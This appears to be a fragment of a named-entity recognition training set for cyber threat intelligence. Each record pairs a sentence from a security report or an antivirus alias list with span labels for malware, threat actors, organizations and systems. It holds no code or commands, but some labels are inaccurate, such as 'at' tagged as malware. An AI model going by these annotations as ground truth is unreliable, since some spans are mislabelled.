{"THREAT_ACTOR: The campaign": [[0, 12]]}, "info": {"id": "cyner2_train_002131", "source": "cyner2_train"}} {"text": "It has been attacking Iranian users.", "spans": {}, "info": {"id": "cyner2_train_002132", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Makecall.20484 Trojan.Makecall Trojan.Makecall.Win32.5 TROJ_MAKECALL.A W32/MalwareF.VJTB W32.Makecall.Trojan TROJ_MAKECALL.A Trojan.Win32.Makecall.a Trojan.Win32.Makecall.fkdu Trojan.Win32.S.Makecall.20484 Troj.W32.Makecall.a!c Trojan.MulDrop.717 BehavesLike.Win32.VBObfus.mz W32/Risk.QDBN-9051 Trojan/MakeCall.d TR/Makecall.a Trojan/Win32.Makecall Trojan:Win32/Makecall.A Trojan.Win32.Makecall.a Trojan/Win32.Makecall.R109087 SScope.Trojan.VBRA.3284 Win32/Makecall.A Win32.Trojan.Makecall.Ecul Trojan.Makecall!Hu8pme7fStI Trojan.Win32.Makecall W32/Makecall.A!tr", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002133", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/Sipay.ADV Trojan.Crypt.GU Trojan/W32.Small.15872.S Trojan.Small.Win32.4658 Trojan/Small.xut Trojan.Win32.Small.glefu Win32/TrojanDownloader.FakeAlert.JI WORM_SMALL.MDA Trojan.Small-8598 Trojan.Crypt.GU Trojan.Crypt.GU Trojan.Small!AZKO6qCeQTg Trojan.Win32.Small.15872.Q[h] Trojan.Dropper/AdobeFake Trojan.Crypt.GU TrojWare.Win32.Small.~YE Trojan.Crypt.GU Trojan.DownLoader10.48865 WORM_SMALL.MDA W32/Trojan2.EQHY Trojan/Small.fnb Trojan/Win32.Small Win32.Troj.Small.kcloud Trojan.Crypt.GU Win-Trojan/Downloader.15872.GU TrojanDownloader:Win32/Bofang.C Trojan.Crypt.GU Trojan.Small Trojan-Downloader.HG W32/FakeAlert.JI!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002134", "source": "cyner2_train"}} {"text": "In addition, Xbot will steal all SMS messages and contact information, intercept certain SMS messages, and parse SMS messages for mTANs Mobile Transaction Authentication Number from banks.", "spans": {"MALWARE: Xbot": [[13, 17]], "ORGANIZATION: banks.": [[182, 188]]}, "info": {"id": "cyner2_train_002135", "source": "cyner2_train"}} {"text": "Using both the Elknot and BillGates DDoS malware, these attackers have continued to infect vulnerable Elasticsearch servers in order to enhance their DDoS capabilities.", "spans": {"MALWARE: Elknot": [[15, 21]], "MALWARE: BillGates DDoS malware,": [[26, 49]], "THREAT_ACTOR: attackers": [[56, 65]], "VULNERABILITY: vulnerable": [[91, 101]], "SYSTEM: Elasticsearch servers": [[102, 123]]}, "info": {"id": "cyner2_train_002136", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/KillAV.a TROJ_SPNR.38J614 Backdoor.Trojan TROJ_SPNR.38J614 Uds.Dangerousobject.Multi!c Trojan.Patched.Win64.2566 W64/Trojan.HLJR-4976 Trojan.KillAV!apRF/prfUvc Trojan.Win64.Killav W64/KillAV.A!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_002137", "source": "cyner2_train"}} {"text": "It now appears to be in the league of full-blown banking trojans such as Dyreza, Neverquest/Vawtrak, Zeus, etc.", "spans": {"MALWARE: banking trojans": [[49, 64]], "MALWARE: Dyreza, Neverquest/Vawtrak, Zeus,": [[73, 106]]}, "info": {"id": "cyner2_train_002138", "source": "cyner2_train"}} {"text": "DIMNIE is a modular information stealer profiled earlier this year by security researchers at PaloAlto s Unit 42, who found the malware in targeted phishing attacks against open-source developers.", "spans": {"MALWARE: DIMNIE": [[0, 6]], "ORGANIZATION: security researchers": [[70, 90]], "ORGANIZATION: PaloAlto": [[94, 102]], "ORGANIZATION: Unit 42,": [[105, 113]], "MALWARE: malware": [[128, 135]], "ORGANIZATION: open-source developers.": [[173, 196]]}, "info": {"id": "cyner2_train_002139", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.UserinitWininit.Trojan Trojan.Delf.QEO Trojan.Bancteian.CB4 Trojan.Delf.QEO Trojan/Spy.Delf.qgs Trojan.Delf.QEO Win32.Virus.Delf.c W32/Delf.UD TROJ_BANCTEIAN.SM Win.Trojan.Bancteian-0-6418983-0 Trojan.Delf.QEO Trojan.Delf.QEO Trojan.Win32.Delf.3301398 Trojan.Delf.QEO Backdoor.Win32.Delf.~DD Trojan.Delf.QEO Adware.BrowseFox.Win32.220566 TROJ_BANCTEIAN.SM BehavesLike.Win32.Trojan.wh Trojan.Win32.Bancteian W32/Delf.CERT-0413 Trojan.Reconyc.apf W32.Trojan.Delf TR/BAS.Samca.lsswh Trojan/Win32.Delf.nbw Trojan:Win32/Bancteian.B Trojan/Win32.Bancteian.R174475 Trojan.Reconyc Trojan.Win32.Delf.qgs W32/Delf.QGS!tr.spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002141", "source": "cyner2_train"}} {"text": "In one of our previous blog entries, we covered how the threat actor known as Winnti was using GitHub to spread malware – a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming, pharmaceutical, and telecommunications companies.", "spans": 
{"THREAT_ACTOR: the threat actor": [[52, 68]], "THREAT_ACTOR: Winnti": [[78, 84]], "SYSTEM: GitHub": [[95, 101]], "MALWARE: malware": [[112, 119]], "THREAT_ACTOR: the group": [[151, 160]], "ORGANIZATION: gaming, pharmaceutical,": [[275, 298]], "ORGANIZATION: telecommunications companies.": [[303, 332]]}, "info": {"id": "cyner2_train_002145", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL.Downloader.AD Trojan.MSIL.Downloader.AD Trojan.MSIL.Downloader.AD Trojan.MSIL.Downloader.AD Trojan.Win32.Inject.ewmdhe Troj.MSIL.Disfa.mCrY Trojan.MSIL.Downloader.AD TrojWare.MSIL.Inject.TEQ Trojan.MSIL.Downloader.AD TR/Inject.xbeihg TrojanDownloader:MSIL/Datsup.A Trojan.MSIL.Downloader.AD Trj/CI.A MSIL/Dloader.AWE!tr Win32/Trojan.cd2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002147", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exp.RTF.CVE-2017-8759.D Trojan.Mdropper Win32/Exploit.CVE-2017-8759.A TROJ_ARTIEF.JEJOWP Rtf.Downloader.CVE_2017-6336326-3 Exploit.MSOffice.CVE-2017-8759.a Exploit.Ole2.CVE-2017-8759.estduh RTF.S.Exploit.44738 Exploit.Msoffice.Cve!c Exploit.CVE-2017-8759.5 TROJ_ARTIEF.JEJOWP RTF/Trojan.BGKX-2 HEUR:Exploit.MSOffice.CVE-2017-8759.a Exploit.CVE-2017-8759 Office.Exploit.Cve-2017-8759.Ajle Trojan.Win32.Exploit Malicious_Behavior.SB Win32/Trojan.Exploit.024", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002148", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.Farfly.L Multi.Threats.InArchive W32/Risk.NCBB-0700 Trojan.Farfli Win.Trojan.Downloader-2275 Trojan.Downloader.Farfly.L Trojan.Downloader.Farfly.L Trojan.Win32.Crypted.dkwpfn Trojan.Win32.Z.Downloader.266845 Trojan.Downloader.Farfly.L Trojan.DownLoader4.59614 Downloader.Selvice.Win32.747 TROJ_DLOADR.SMQ Trojan-Downloader.Win32.Selvice W32/MalwareS.ASNW Trojan.Downloader.Farfly.L TrojanDownloader:Win32/Caxnet.B Worm.WhiteIce Trojan.Downloader.Farfly.L 
Trojan.Downloader.Farfly.L Trojan.DL.Selvice!qQfZyIPcdpU Win32/Trojan.Downloader.6fb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002149", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Hijacker.kvdpi TROJ_DYER.BMC Trojan.Enfal-7 HEUR:Trojan.Win32.Invader Trojan.Hijacker!h2YIjU+BiQU Trojan.DownLoader7.14277 TROJ_DYER.BMC Trojan/Invader.exe W32/Bfr.2!tr Trojan[:HEUR]/Win32.Invader Win-Trojan/Inject.16896.IT Win32.Trojan.Hijacker.Ebqw Trojan.Win32.Sanpec Win32/Trojan.1da", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002150", "source": "cyner2_train"}} {"text": "The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes.", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[28, 41]], "ORGANIZATION: Uyghur and Tibetan activists": [[66, 94]]}, "info": {"id": "cyner2_train_002151", "source": "cyner2_train"}} {"text": "This new threat also uses a macro to infect the target's computer, but rather than retrieving a binary payload, it relies on various scripts to maintain its presence and to communicate via hacked websites, acting as proxies for the command and control server.", "spans": {"MALWARE: new threat": [[5, 15]], "MALWARE: macro": [[28, 33]], "MALWARE: infect": [[37, 43]], "SYSTEM: the target's computer,": [[44, 66]], "MALWARE: binary payload,": [[96, 111]]}, "info": {"id": "cyner2_train_002152", "source": "cyner2_train"}} {"text": "A backdoor also known as: Downloader.Myxa.Win32.113 Trojan/Downloader.Myxa.cit Trojan.Kazy.D6034 TROJ_MONKIF.SMKP Win32.Trojan.WisdomEyes.16070401.9500.9999 Downloader.Monkif TROJ_MONKIF.SMKP Win.Downloader.100478-1 Trojan.Win32.Myxa.bqhvc Trojan.Win32.A.Downloader.22672.B Trojan.DownLoad3.32720 Trojan-Downloader.Win32.Myxa TrojanDownloader.Myxa.cx TrojanDownloader:Win32/Monkif.T Downloader/Win32.Monkif.R1925 TrojanDownloader.Myxa Trj/Myxa.A Trojan.DL.Myxa!oB3ehXmv9m8", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002154", "source": "cyner2_train"}} {"text": "When we talk about the attackers, there is this misconception that they are these super villains who can only do evil, but keep in mind they are humans too.", "spans": {"THREAT_ACTOR: attackers,": [[23, 33]]}, "info": {"id": "cyner2_train_002155", "source": "cyner2_train"}} {"text": "This macro comes into users' systems through a spam email with subjects such as My Resume, Openings, Internship, etc.", "spans": {"MALWARE: macro": [[5, 10]], "SYSTEM: users' systems": [[22, 36]]}, "info": {"id": "cyner2_train_002157", "source": "cyner2_train"}} {"text": "A backdoor also known as: Android.FakeToken.B A.H.Pay.Erop.YG Android.Trojan.SMSBot.B AndroidOS/FakeToken.B HEUR:Trojan-Banker.AndroidOS.Faketoken.a Android.Trojan.SMSBot.B Trojan.Android.SMSBot.b Android.Malware.Trojan Trojan:Android/SmsSpy.K Android.SmsSend.419.origin AndroidOS/FakeToken.B Trojan[Banker]/Android.Faketoken Android.Troj.at_Stealer.g.kcloud HEUR:Trojan-Banker.AndroidOS.Faketoken.a Android.Trojan.SMSBot.B Trojan.AndroidOS.SendSMS Android/FkToken.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002158", "source": "cyner2_train"}} {"text": "Android malware creators have recently been mixing business with play.", "spans": {"THREAT_ACTOR: Android malware creators": [[0, 24]]}, "info": {"id": "cyner2_train_002160", "source": "cyner2_train"}} {"text": "DNS is an ideal fit for frequently exporting small chunks of custom encoded data i.e. 
credit card track 1 and track 2 data to an external, remote location.", "spans": {"SYSTEM: DNS": [[0, 3]]}, "info": {"id": "cyner2_train_002161", "source": "cyner2_train"}} {"text": "We have recently encountered very aggressive jabber spam campaign, advertising the Philadelphia ransomware.", "spans": {"THREAT_ACTOR: jabber spam campaign,": [[45, 66]], "MALWARE: the Philadelphia ransomware.": [[79, 107]]}, "info": {"id": "cyner2_train_002162", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zusy.D39A16 Win32.Trojan.WisdomEyes.16070401.9500.9800 Backdoor.Trojan TSPY_REALTIME.A Trojan.RealSpy TSPY_REALTIME.A W32/Risk.KQTT-6320 Trojan/Win32.HDC.C24097", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002163", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Downloader.Delf.quw Win32.Trojan.WisdomEyes.16070401.9500.9770 Win.Trojan.Downloader-57555 Trojan.DownLoad2.37645 BehavesLike.Win32.PUPXAS.ch Trojan.Graftor.D1EFD7 TrojanDownloader:Win32/Blortios.C Trojan/Win32.Downloader.R18903 Win32/Trojan.88b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002164", "source": "cyner2_train"}} {"text": "In recent weeks, Unit 42 has been analyzing delivery documents used in spear-phishing attacks that drop a custom downloader used in cyber espionage attacks.", "spans": {"ORGANIZATION: Unit 42": [[17, 24]], "MALWARE: custom downloader": [[106, 123]]}, "info": {"id": "cyner2_train_002165", "source": "cyner2_train"}} {"text": "But over the past week, while performing research using Palo Alto Networks AutoFocus, we noticed a large uptick in the delivery of the Hancitor malware family as they shifted away from H1N1 to distribute Pony and Vawtrak executables.", "spans": {"ORGANIZATION: Palo Alto Networks": [[56, 74]], "SYSTEM: AutoFocus,": [[75, 85]], "MALWARE: the Hancitor malware family": [[131, 158]], "MALWARE: H1N1": [[185, 189]], "MALWARE: Pony": [[204, 208]], "MALWARE: Vawtrak executables.": 
[[213, 233]]}, "info": {"id": "cyner2_train_002166", "source": "cyner2_train"}} {"text": "Ransomware sure has had an uptick the past years; more and more variants appear while some have been leading the pack for the past years.", "spans": {"MALWARE: Ransomware": [[0, 10]], "MALWARE: variants": [[64, 72]]}, "info": {"id": "cyner2_train_002167", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Clicker.Small.ht Win32/TrojanClicker.Small.HT W32/TrojanX.MXY Smalltroj.BDN Win32.Small.ht Trojan-Clicker.Win32.Small.ht Trojan.Clicker.Small.HT TrojWare.Win32.TrojanClicker.Small.HT Trojan-Clicker.Win32.Small.ht Win32/TrojanClicker.Small.HT TR/Click.Small.HT W32/TrojanX.MXY Trojan-Downloader.Win32.Small!IK Trojan.Click.Small.HT TrojanClicker:Win32/Small.BB Trojan.Clicker.Small.HT Win-Trojan/Downloader.120895 Trojan-Clicker.Win32.Small.ht Trojan-Clicker.Small.HT Trojan-Clicker.Small.HT Trojan.Clicker.Autoit Trojan-Downloader.Win32.Small W32/Small.HT!tr Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002168", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Badur!O Win32.Trojan.WisdomEyes.16070401.9500.9996 TR/Rogue.1517892 Trojan/Win32.Badur TrojanDownloader:MSIL/Balamid.A Trojan.Zusy.D13D03 Trojan.Badur Trojan.Badur!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002170", "source": "cyner2_train"}} {"text": "The company later released a whitepaper which described Qbot version 910 in great detail.", "spans": {"ORGANIZATION: company": [[4, 11]], "MALWARE: Qbot version 910": [[56, 72]]}, "info": {"id": "cyner2_train_002171", "source": "cyner2_train"}} {"text": "The investigation found a supply chain-focused attack at M.E.Doc software that delivered a destructive payload disguised as ransomware.", "spans": {"MALWARE: at": [[54, 56]], "MALWARE: M.E.Doc software": [[57, 73]], "MALWARE: payload": [[103, 110]], "MALWARE: ransomware.": [[124, 135]]}, "info": {"id": 
"cyner2_train_002172", "source": "cyner2_train"}} {"text": "There were several things that struck us as both interesting and concerning about the details; a threat actor known to operate in South East Asia is now using secure sockets layer SSL encryption in their malware.", "spans": {"THREAT_ACTOR: a threat actor": [[95, 109]], "MALWARE: malware.": [[204, 212]]}, "info": {"id": "cyner2_train_002173", "source": "cyner2_train"}} {"text": "A backdoor also known as: Downloader.Banload.10000 Trojan.Banker Win32.Trojan.WisdomEyes.16070401.9500.9955 Trojan.DownLoader13.22599 W32/Banker.ABCU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002175", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.Braidupdate.C Trojan.Downloader.Braidupdate.C Trojan.Win32.Braidupdate.frhy W32/Downloader.AAJ Adware.BrowserAid Win32/TrojanDownloader.Braidupdate.C TROJ_BRAIDUPDT.C Worm.WinUpToDate Trojan-Downloader.Win32.Braidupdate.c Trojan.Downloader.Braidupdate.C Trojan.DL.Braidupdate!ucpSRQWfQfk Win32.Trojan-downloader.Braidupdate.Tayo Trojan.Downloader.Braidupdate.C TrojWare.Win32.TrojanDownloader.Braidupdate.C Trojan.Downloader.Braidupdate.C Trojan.Braid Downloader.Braidupdate.Win32.3 TROJ_BRAIDUPDT.C W32/Downloader.IZKY-4160 TR/Dldr.Braidupda.C W32/Braidupdate.C!tr.dldr Trojan[Downloader]/Win32.Braidupdate Trojan.Downloader.Braidupdate.C Troj.Downloader.W32.Braidupdate.c!c Trojan/Win32.Braidupdate TrojanDownloader:Win32/Braidupdate.C Trojan.Downloader.Braidupdate.C TrojanDownloader.Braidupdate not-a-virus:AdWare.Win32.Cash Trojan.Downloader.Braidupdate.C Downloader.Braidupdate.C Win32/Trojan.Downloader.2d9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002176", "source": "cyner2_train"}} {"text": "The Angler Exploti Kit has integrated CVE-2015-5119 leaked from HackingTeam.", "spans": {"MALWARE: Angler Exploti Kit": [[4, 22]], "ORGANIZATION: HackingTeam.": [[64, 76]]}, "info": {"id": 
"cyner2_train_002177", "source": "cyner2_train"}} {"text": "Gafgyt botnet attacking Netcore routers", "spans": {"MALWARE: Gafgyt botnet": [[0, 13]], "SYSTEM: Netcore routers": [[24, 39]]}, "info": {"id": "cyner2_train_002182", "source": "cyner2_train"}} {"text": "During our continued research on Sofacy's Komplex Trojan, we have found a sample of a backdoor Trojan that we believe the Sofacy group uses when targeting individuals running macOS systems.", "spans": {"THREAT_ACTOR: Sofacy's": [[33, 41]], "MALWARE: Komplex": [[42, 49]], "MALWARE: Trojan, we": [[50, 60]], "MALWARE: sample": [[74, 80]], "MALWARE: backdoor Trojan": [[86, 101]], "THREAT_ACTOR: the Sofacy group": [[118, 134]], "ORGANIZATION: individuals": [[155, 166]], "SYSTEM: macOS systems.": [[175, 189]]}, "info": {"id": "cyner2_train_002183", "source": "cyner2_train"}} {"text": "There are two variations of the emails: one is an order confirmation from a Japanese equipment supplier and the other pretends to come from a local printing company.", "spans": {}, "info": {"id": "cyner2_train_002184", "source": "cyner2_train"}} {"text": "This post will start to explore some of these obfuscations to get a better understanding of how FormBook works.", "spans": {}, "info": {"id": "cyner2_train_002187", "source": "cyner2_train"}} {"text": "[Zscaler] has covered Dridex Banking Trojan being delivered via various campaigns involving Office documents with malicious VBA macros in the past.", "spans": {"ORGANIZATION: [Zscaler]": [[0, 9]], "MALWARE: Dridex Banking Trojan": [[22, 43]], "THREAT_ACTOR: campaigns": [[72, 81]], "VULNERABILITY: malicious VBA macros": [[114, 134]]}, "info": {"id": "cyner2_train_002188", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-GameThief.Win32.OnLineGames!O Win32.Trojan.WisdomEyes.16070401.9500.9987 Trojan.Drondog Win.Downloader.29758-2 Worm.Win32.Downloader.bldi Trojan.Win32.MLW.xzlu W32.W.Downloader.hq!c Trojan.MulDrop.15154 Trojan.Win32.KillAV Worm/Downloader.fd 
TR/Sorri.O Worm/Win32.Downloader Win32.Troj.DownLoaderT.hu.147456 Trojan:Win32/Wiessy.A Worm/Win32.Downloader.R2522", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002189", "source": "cyner2_train"}} {"text": "The malware is able to control banking transactions conducted using Internet Explorer, and harvest email credentials, which are in turn used to spread the malware further.", "spans": {"MALWARE: malware": [[4, 11], [155, 162]], "SYSTEM: Internet Explorer,": [[68, 86]]}, "info": {"id": "cyner2_train_002191", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DownLoader4.13271", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002192", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DelfiDelfi.Win32.301 Trojan.Win32.DelfiDelfi.cho Trojan.Win32.DelfiDelfi.etgljb W32/Trojan.AITA-6805 Trojan.Win32.DelfiDelfi.cho TrojanDownloader:Win32/Banavkill.A Trj/GdSda.A Trojan.DelfiDelfi! W32/Banker.AEAY!tr.spy Win32/Trojan.af4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002196", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.37860.B Trojan-PSW.Win32.Yahu.YPager!O Trojan/PSW.Yahu.YPager.r Trojan.Kazy.D15AC9 Win32.Trojan.WisdomEyes.16070401.9500.9973 W32/Pws.BHSA Win32/YPager.D Trojan.Win32.Scar.kjpu Troj.W32.Scar!c TrojWare.Win32.PSW.YahooPager.R0 Trojan.DownLoader6.48717 Trojan.Yahoo.Win32.38 BehavesLike.Win32.Virus.nt Trojan-PWS.Win32.Yahoo W32/PWS.TYKP-7651 Trojan/PSW.Yahu.y Trojan[PSW]/Win32.Yahu Trojan.Win32.Scar.kjpu Trojan/Win32.Jorik.C1078 Win32/PSW.Yahoo.YPager.R Win32.Trojan.Scar.Pfsz W32/Yahoo_YPager.R!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002197", "source": "cyner2_train"}} {"text": "The samples we identified target the ATM vendor Diebold.", "spans": {"SYSTEM: ATM vendor Diebold.": [[37, 56]]}, "info": {"id": "cyner2_train_002198", "source": "cyner2_train"}} {"text": 
"A backdoor also known as: Trojan-Dropper.Win32.Taob.ag Trojan.DR.Taob!NlMVsECgQGE Trojan.MulDrop4.3634 TR/PSW.OnlineGames.wtog TrojanDropper.Taob.o Win32.Troj.Taob.ag.kcloud Trojan:Win32/Cortheaper.A Trojan-GameThief.Win32.OnLineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002199", "source": "cyner2_train"}} {"text": "At the time it was removed, the plugin was installed on more than 200,00 sites, albeit we cannot be sure how many of these were updated to a version that included the malicious behavior.", "spans": {}, "info": {"id": "cyner2_train_002201", "source": "cyner2_train"}} {"text": "Finished ! * * * End translation * * * Referring again to bit.ly , we can see click statistics for this campaign ( Figure 6 ) .", "spans": {}, "info": {"id": "cyner2_train_002202", "source": "cyner2_train"}} {"text": "Twitter user @hkashfi posted a Tweet saying that one of his friends received a file US Travel Docs Information.jar from someone posing as USTRAVELDOCS.COM support personnel using the Skype account ustravelidocs-switzerland notice the i between travel and docs .", "spans": {"ORGANIZATION: Twitter": [[0, 7]], "ORGANIZATION: user @hkashfi": [[8, 21]]}, "info": {"id": "cyner2_train_002204", "source": "cyner2_train"}} {"text": "Successful exploitation typically results in malware calling back to one or more Uyghur themed domain names.", "spans": {"VULNERABILITY: exploitation": [[11, 23]], "MALWARE: malware": [[45, 52]], "ORGANIZATION: Uyghur": [[81, 87]]}, "info": {"id": "cyner2_train_002205", "source": "cyner2_train"}} {"text": "Banking Trojans continue to evolve and threat actors are using them in new ways, even as the massive Dridex campaigns of 2015 have given way to ransomware and other payloads.", "spans": {"MALWARE: Banking Trojans": [[0, 15]], "THREAT_ACTOR: threat actors": [[39, 52]], "THREAT_ACTOR: Dridex campaigns": [[101, 117]], "MALWARE: ransomware": [[144, 154]], "MALWARE: payloads.": [[165, 174]]}, "info": {"id": 
"cyner2_train_002206", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Vburses Trojan.Win32.Vburses", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002207", "source": "cyner2_train"}} {"text": "During the operation, the malware was used to dox 400,000 members of Vietnam Airlines.", "spans": {"THREAT_ACTOR: operation,": [[11, 21]], "MALWARE: malware": [[26, 33]], "ORGANIZATION: Vietnam Airlines.": [[69, 86]]}, "info": {"id": "cyner2_train_002211", "source": "cyner2_train"}} {"text": "The Trojan deletes Volume Shadow Copies.", "spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_002212", "source": "cyner2_train"}} {"text": "The MuddyWater attacks are primarily against Middle Eastern nations.", "spans": {"THREAT_ACTOR: The MuddyWater": [[0, 14]]}, "info": {"id": "cyner2_train_002214", "source": "cyner2_train"}} {"text": "Elirks, less widely known than PlugX, is a basic backdoor Trojan, first discovered in 2010, that is primarily used to steal information from compromised systems.", "spans": {"MALWARE: Elirks,": [[0, 7]], "MALWARE: PlugX,": [[31, 37]], "MALWARE: basic backdoor Trojan,": [[43, 65]], "SYSTEM: compromised systems.": [[141, 161]]}, "info": {"id": "cyner2_train_002216", "source": "cyner2_train"}} {"text": "Through our research on the Windows KLRD keylogger from the Odinaff report, we were able to discover several new keyloggers.", "spans": {"MALWARE: Windows KLRD keylogger": [[28, 50]], "ORGANIZATION: Odinaff": [[60, 67]], "MALWARE: keyloggers.": [[113, 124]]}, "info": {"id": "cyner2_train_002217", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hacktool.Mapiget W32/MalwareF.HUIZ Trojan.Badname HackTool.Win32.MapiGet.a Trojan.Win32.MapiGet.cwwjwt Hacktool.W32.Mapiget!c Trojan.KeyLogger.28306 Tool.MapiGet.Win32.1 W32/Risk.LFSI-6446 HackTool.MapiGet.a Misc.HackTool.MailLogger TR/Spy.Mail.G HackTool/Win32.MapiGet Trojan.Graftor.D3C87F HackTool.Win32.MapiGet.a 
Win32.Hacktool.Mapiget.Iso TrojanSpy.Mail!RGqYbEAheeQ HackTool.Win32.MapiGet Win32/Trojan.Hacktool.eb5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002218", "source": "cyner2_train"}} {"text": "A backdoor also known as: BackDoor-FHS.dr Trojan/Witthy.a Trojan.Win32.Clicker.crbxjx Trojan.Click2.48783 BehavesLike.Win32.VirRansom.cc Trojan.Win32.Merlos TR/Rogue.7786243 Trj/CI.A Win32/Witthy.A W32/Witthy.A!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002219", "source": "cyner2_train"}} {"text": "Recent samples of the malware have now included the ability to use Google services for command-and-control C&C communication.", "spans": {"MALWARE: malware": [[22, 29]], "SYSTEM: Google services": [[67, 82]]}, "info": {"id": "cyner2_train_002220", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_RAMDO.SM0 Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_RAMDO.SM0 BehavesLike.Win32.Virut.fh Trojan.Win32.Ramdo Trojan.Ramdo.1 Trojan:Win32/Ramdo.H Backdoor/Win32.Necurs.R100690 Malware-Cryptor.Limpopo Trj/Dtcontx.K Win32/Redyms.AF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002221", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.3AEC Win32.Trojan.WisdomEyes.16070401.9500.9901 Trojan.Win32.Inject.ctprfv W32.Sality.l8GK Trojan.KillProc.28723 Trojan/Nimnul.b Trojan[Ransom]/Win32.PornoAsset Ransom:Win32/Dircrypt.C Trojan.Graftor.D199D8 Trojan.Crypt Trojan.Win32.VB Trj/Dtcontx.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002222", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Crypt.Delf.AL Trojan-Downloader.Win32.Banload!O Downloader.Banload.Win32.27568 TROJ_DELF.NOR Win32.Trojan.WisdomEyes.16070401.9500.9934 W32/Downldr2.ATJF Backdoor.Trojan Win32/Pigeon.AYDG Win.Downloader.20057-1 Trojan.Crypt.Delf.AL Trojan-Downloader.Win32.Banload.evb Trojan.Crypt.Delf.AL Trojan.Win32.Drop.dzdiyr 
Trojan.Win32.A.Downloader.214016.H Troj.Downloader.W32.Banload!c Trojan.Crypt.Delf.AL Backdoor.Win32.Remote.~N Trojan.Crypt.Delf.AL Trojan.MulDrop.12358 BehavesLike.Win32.Worm.dc Trojan/Downloader.Banload.evb TrojanDownloader.Banload.jwv TR/Delf.18944 Trojan[Backdoor]/Win32.Ceckno Trojan.Crypt.Delf.AL Trojan-Downloader.Win32.Banload.evb Trojan.Crypt.Delf.AL TrojanDownloader.Delf Bck/Hupigon.KPG Win32/Delf.NXK Win32.Trojan-downloader.Banload.Dxnj Backdoor.Ceckno!iv4t9tSa5f0 Trojan-Dropper.Delf W32/Delf.NIP!tr.bdr Win32/Trojan.823", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002223", "source": "cyner2_train"}} {"text": "Bitter APT is a South Asian threat group that commonly targets energy and government sectors; they have been known to target Pakistan, China, Bangladesh, and Saudi Arabia.", "spans": {"THREAT_ACTOR: Bitter APT": [[0, 10]], "THREAT_ACTOR: a South Asian threat group": [[14, 40]], "ORGANIZATION: energy": [[63, 69]], "ORGANIZATION: government sectors;": [[74, 93]]}, "info": {"id": "cyner2_train_002225", "source": "cyner2_train"}} {"text": "A backdoor also known as: Joke.Melter.A Win32.Trojan.WisdomEyes.16070401.9500.9752 W32/Joke.SXAT-7954 Joke.Melter.A Joke.Melter.A Joke.Melter.A Heur.Corrupt.PE Joke.Melter.A Joke.Finger.5 not-a-virus:BadJoke.Win32.Melter W32/Joke.BY Joke.Melter.A Joke:Win32/Melter.dam#4 Joke.Melter.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002231", "source": "cyner2_train"}} {"text": 